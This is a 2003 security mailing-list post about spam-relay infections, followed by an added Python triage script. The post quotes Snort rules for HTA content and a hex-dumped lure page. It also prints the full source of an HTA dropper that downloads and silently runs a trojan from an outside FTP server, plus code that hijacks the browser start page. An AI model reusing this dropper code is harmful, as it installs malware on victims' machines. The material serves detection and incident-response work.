[unisog] Spamming machines: a mystery dll?

Gary Flynn flynngn at jmu.edu
Fri Sep 26 15:45:17 GMT 2003


This may be useful:
http://www.lurhq.com/autoproxy.html

Also, if you have Snort or another IDS/packet capture device
at your border, you may want to watch for application/hta:

alert tcp any 80 -> any any (msg:"HTA MIME Content in HTML";content:"Content-Type\:";nocase;content:"application/hta";nocase;)
alert tcp any any -> any 25 (msg:"HTA MIME Content in SMTP";content:"Content-Type\:";nocase;content:"application/hta";nocase;)

and then follow up on the sessions.

Sample:

****************************************************************
Snort capture
****************************************************************

34 0D 0A 0D 0A 3C 68 74 6D 6C 3E 3C 62 6F 64 79  4....<html><body
3E 0D 0A 3C 73 70 61 6E 20 64 61 74 61 73 72 63  >..<span datasrc
3D 22 23 6F 45 78 65 63 22 20 64 61 74 61 66 6C  ="#oExec" datafl
64 3D 22 65 78 70 6C 6F 69 74 22 20 64 61 74 61  d="exploit" data
66 6F 72 6D 61 74 61 73 3D 22 68 74 6D 6C 22 3E  formatas="html">
3C 2F 73 70 61 6E 3E 0D 0A 3C 78 6D 6C 20 69 64  </span>..<xml id
3D 22 6F 45 78 65 63 22 3E 0D 0A 3C 73 65 63 75  ="oExec">..<secu
72 69 74 79 3E 0D 0A 3C 65 78 70 6C 6F 69 74 3E  rity>..<exploit>
0D 0A 3C 21 5B 43 44 41 54 41 5B 0D 0A 3C 6F 62  ..<![CDATA[..<ob
6A 65 63 74 20 64 61 74 61 3D 68 74 74 70 3A 2F  ject data=http:/
2F 77 76 77 2E 62 65 65 63 68 2D 69 6E 66 6F 32  /wvw.beech-info2
2E 63 6F 6D 2F 5F 76 74 69 5F 63 6F 6E 2F 69 6E  .com/_vti_con/in
66 2E 6F 6F 6F 20 77 69 64 74 68 3D 30 20 68 65  f.ooo width=0 he
69 67 68 74 3D 30 3E 0D 0A 5D 5D 3E 0D 0A 3C 2F  ight=0>..]]>..</
65 78 70 6C 6F 69 74 3E 0D 0A 3C 2F 73 65 63 75  exploit>..</secu
72 69 74 79 3E 0D 0A 3C 2F 78 6D 6C 3E 0D 0A 3C  rity>..</xml>..<
2F 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E           /body></html>

*****************************************************************
inf.ooo file from referenced site:
*****************************************************************

<html>
<HTA:APPLICATION ID="hope"
APPLICATIONNAME="hopeInstaller"
BORDER="none"
CAPTION="no"
ICON=""
CONTEXTMENU="no"
MAXIMIZEBUTTON="no"
MINIMIZEBUTTON="no"
SCROLL="no"
SHOWINTASKBAR="no"
SINGLEINSTANCE="no"
SELECTION="no"
INNERBORDER="no"
SYSMENU="no"
VERSION="1.0"
HEIGHT="1"
WIDTH="1"
WINDOWSTATE="normal"/>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
self.moveTo(3000,0);
self.blur();
fso = new ActiveXObject("Scripting.FileSystemObject");
WshSysEnv = wsh.Environment("Process");
t = WshSysEnv("windir");
if (!fso.FileExists(t+"\\sv.exe"))
{
if (!fso.FileExists(t+"\\ftp.txt"))
{
f = fso.CreateTextFile(t+"\\ftp.txt", true);
f.WriteLine("open wvw.beech-info2.com 53");
f.WriteLine("binary");
f.WriteLine("get ap216.exe "+t+"\\sv.exe");
f.WriteLine("quit");
f.Close();
wsh.Run("cmD.exe /q /t /c ftp -s:%windir%\\ftp.txt -A", intWindowStyle="0", bWaitOnReturn="TRUE");
wsh.Run("cmD.exe /q /t /c del %windir%\\ftp.txt /q",intWindowStyle="0");
wsh.Run("cmD.exe /q /t /c %windir%\\sv.exe",intWindowStyle="0");
}
}
</script>
</html>

*********************************************************

Note the FTP server wvw.beech-info2.com on port 53. I
was able to connect to it and log in as anonymous, but
I wasn't able to get a directory listing or download the ap216.exe
file, which is mentioned at the site below as the autoproxy
trojan:

http://www.lurhq.com/autoproxy.html


References to passthison.com also seem to be well represented
in the captured traffic:

0A 0D 0A 31 63 65 0D 0A 3C 68 74 6D 6C 3E 0A 3C  ...1ce..<html>.<
6F 62 6A 65 63 74 20 69 64 3D 27 77 73 68 27 20  object id='wsh'
63 6C 61 73 73 69 64 3D 27 63 6C 73 69 64 3A 46  classid='clsid:F
39 33 35 44 43 32 32 2D 31 43 46 30 2D 31 31 44  935DC22-1CF0-11D
30 2D 41 44 42 39 2D 30 30 43 30 34 46 44 35 38  0-ADB9-00C04FD58
41 30 42 27 3E 3C 2F 6F 62 6A 65 63 74 3E 0A 3C  A0B'></object>.<
73 63 72 69 70 74 3E 0A 77 73 68 2E 52 65 67 57  script>.wsh.RegW
72 69 74 65 28 22 48 4B 43 55 5C 5C 53 6F 66 74  rite("HKCU\\Soft
77 61 72 65 5C 5C 4D 69 63 72 6F 73 6F 66 74 5C  ware\\Microsoft\
5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72  \Internet Explor
65 72 5C 5C 4D 61 69 6E 5C 5C 53 74 61 72 74 20  er\\Main\\Start
50 61 67 65 22 2C 20 22 68 74 74 70 3A 2F 2F 77  Page", "http://w
77 77 2E 70 61 73 73 74 68 69 73 6F 6E 2E 63 6F  ww.passthison.co
6D 2F 72 34 2F 3F 76 75 30 38 33 30 30 33 2D 66  m/r4/?vu083003-f
69 6E 61 6C 2D 64 65 73 74 69 6E 61 74 69 6F 6E  inal-destination
2D 72 65 64 69 72 65 63 74 2D 74 6F 2D 2D 2D 2D  -redirect-to----
2D 2D 2D 2D 2D 2D 2D 2D 68 74 74 70 3A 2F 2F 77  --------http://w
77 77 2E 6E 65 77 2D 64 65 66 61 75 6C 74 2D 68  ww.new-default-h
6F 6D 65 70 61 67 65 33 33 39 38 39 30 30 30 32  omepage339890002
32 32 38 33 33 33 39 33 33 39 38 39 30 30 30 32  2283339339890002
32 32 38 33 33 33 39 33 33 39 38 39 30 30 30 32  2283339339890002
32 32 38 33 33 33 39 33 33 39 38 39 30 30 30 32  2283339339890002
32 32 38 33 33 33 39 33 33 39 38 39 30 30 30 32  2283339339890002
32 32 38 33 33 33 39 33 33 39 38 39 30 30 30 32  2283339339890002
32 32 38 33 33 33 39 2E 6E 65 74 22 29 0A 3C 2F  2283339.net").</


BTW, has anyone disabled the HTA MIME type association in the
registry of a significant number of machines as suggested
by the CERT advisory?
http://www.kb.cert.org/vuls/id/865940

We're blocking application/hta at our mail server but
that doesn't do anything for the web threat.

-- 
Gary Flynn
Security Engineer - Technical Services
James Madison University

Please R.U.N.S.A.F.E.
http://www.jmu.edu/computing/runsafe
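Added example, not part of Gary's message or of any tool he mentions: a small Python triage script that does offline the three things the post does by hand. It decodes a Snort-style hex dump back into bytes, applies the Content-Type check that the two Snort rules approximate (but anchored to header lines, so a page that merely talks about application/hta in its body does not fire), and pulls the indicators a responder follows up on (object URLs, CLSIDs, the FTP server and port, fetched file names, commands run, registry writes) out of an HTA dropper. The hex-dump rows and the abbreviated HTA are transcribed from the post above; the HTTP response, the SMTP message and the benign page that wrap them are constructed for this example and are not real captures.

```python
"""Offline triage for the application/hta lure described in the post.

Added example (not from the original message). Decodes a Snort-style hex
dump, applies a header-anchored application/hta check, and extracts
indicators from an HTA dropper. Sample inputs are embedded below.
"""
import re
from typing import Dict

# Hex-dump rows copied from the Snort capture in the post (first three rows).
SAMPLE_DUMP = """\
34 0D 0A 0D 0A 3C 68 74 6D 6C 3E 3C 62 6F 64 79  4....<html><body
3E 0D 0A 3C 73 70 61 6E 20 64 61 74 61 73 72 63  >..<span datasrc
3D 22 23 6F 45 78 65 63 22 20 64 61 74 61 66 6C  ="#oExec" datafl
"""

# Abbreviated transcription of the inf.ooo dropper quoted in the post.
SAMPLE_HTA = r"""<html>
<HTA:APPLICATION ID="hope" APPLICATIONNAME="hopeInstaller" WINDOWSTATE="normal"/>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
f.WriteLine("open wvw.beech-info2.com 53");
f.WriteLine("binary");
f.WriteLine("get ap216.exe "+t+"\\sv.exe");
wsh.Run("cmD.exe /q /t /c ftp -s:%windir%\\ftp.txt -A", intWindowStyle="0", bWaitOnReturn="TRUE");
wsh.Run("cmD.exe /q /t /c %windir%\\sv.exe",intWindowStyle="0");
</script>
</html>
"""

# Constructed HTTP response (not a real capture) delivering the HTA.
SAMPLE_HTTP = b"HTTP/1.1 200 OK\r\nContent-Type: Application/HTA\r\n\r\n" + SAMPLE_HTA.encode()
# Constructed MIME message with an HTA part: the SMTP side of the two rules.
SAMPLE_SMTP = (b"Subject: hi\r\nContent-Type: multipart/mixed; boundary=b\r\n\r\n"
               b"--b\r\nContent-Type: text/plain\r\n\r\nsee attachment\r\n"
               b"--b\r\nContent-Type: application/hta; name=\"inf.hta\"\r\n\r\n<html></html>\r\n--b--\r\n")
# Constructed benign page that only mentions the MIME type in its body.
SAMPLE_BENIGN = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<p>block application/hta at the gateway</p>"

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")
# Header-anchored: must start a line, so body text cannot match.
HTA_CT = re.compile(rb"^content-type\s*:\s*application/hta\b", re.I | re.M)
OBJECT_DATA = re.compile(r"<object[^>]*\sdata=['\"]?([^\s'\">]+)", re.I)
CLSID = re.compile(r"clsid:([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})", re.I)
FTP_OPEN = re.compile(r'WriteLine\("open\s+(\S+)\s+(\d+)"\)')
FTP_GET = re.compile(r'WriteLine\("get\s+(\S+)')
RUN_CMD = re.compile(r'wsh\.Run\("([^"]+)"')
REG_WRITE = re.compile(r'RegWrite\("([^"]+)",\s*"([^"]+)"')


def decode_hex_dump(dump: str, width: int = 16) -> bytes:
    """Recover bytes from a Snort-style dump: `width` hex pairs, then an ASCII column.
    Only the fixed-width hex column is parsed, so ASCII text that happens to look
    like a hex pair (e.g. 'ab cd') is never mistaken for data."""
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.lstrip()[: width * 3].split():
            if not HEX_PAIR.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def carries_hta(message: bytes) -> bool:
    """True when any header line (HTTP response headers, or a MIME part header
    inside an SMTP message) declares the application/hta media type."""
    return HTA_CT.search(message) is not None


def extract_iocs(hta_source: str) -> Dict[str, object]:
    """Pull the indicators a responder follows up on from HTA / lure source."""
    servers = [(host, int(port)) for host, port in FTP_OPEN.findall(hta_source)]
    return {
        "object_urls": OBJECT_DATA.findall(hta_source),
        "clsids": [c.upper() for c in CLSID.findall(hta_source)],
        "ftp_servers": servers,
        # FTP on anything but 21 is itself worth a border firewall rule.
        "ftp_nonstandard_port": [s for s in servers if s[1] != 21],
        "ftp_files": FTP_GET.findall(hta_source),
        "commands": RUN_CMD.findall(hta_source),
        "registry_writes": REG_WRITE.findall(hta_source),
    }


def triage_http_response(raw: bytes) -> Dict[str, object]:
    """Split an HTTP response, apply the MIME check to the headers only, and
    extract indicators from the body when it fires."""
    head, _, body = raw.partition(b"\r\n\r\n")
    hit = carries_hta(head)
    return {"hta": hit, "iocs": extract_iocs(body.decode("latin-1")) if hit else {}}


if __name__ == "__main__":
    print(decode_hex_dump(SAMPLE_DUMP))  # leading bytes are chunked-transfer framing caught mid-stream
    for name, sample in (("http", SAMPLE_HTTP), ("smtp", SAMPLE_SMTP), ("benign", SAMPLE_BENIGN)):
        print(name, carries_hta(sample))
    print(triage_http_response(SAMPLE_HTTP))
```

The two Snort rules as posted fire whenever both `Content-Type:` and `application/hta` occur anywhere in a packet, so a mail or page that merely discusses the MIME type trips them; the check above only honours the string when it begins a header line, which is what you want when deciding which sessions to chase. Run the decoder over the full capture in the post to recover the lure page, then feed the fetched inf.ooo to `extract_iocs` to get the FTP host, the non-standard port 53 and the ap216.exe/sv.exe names in one place.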


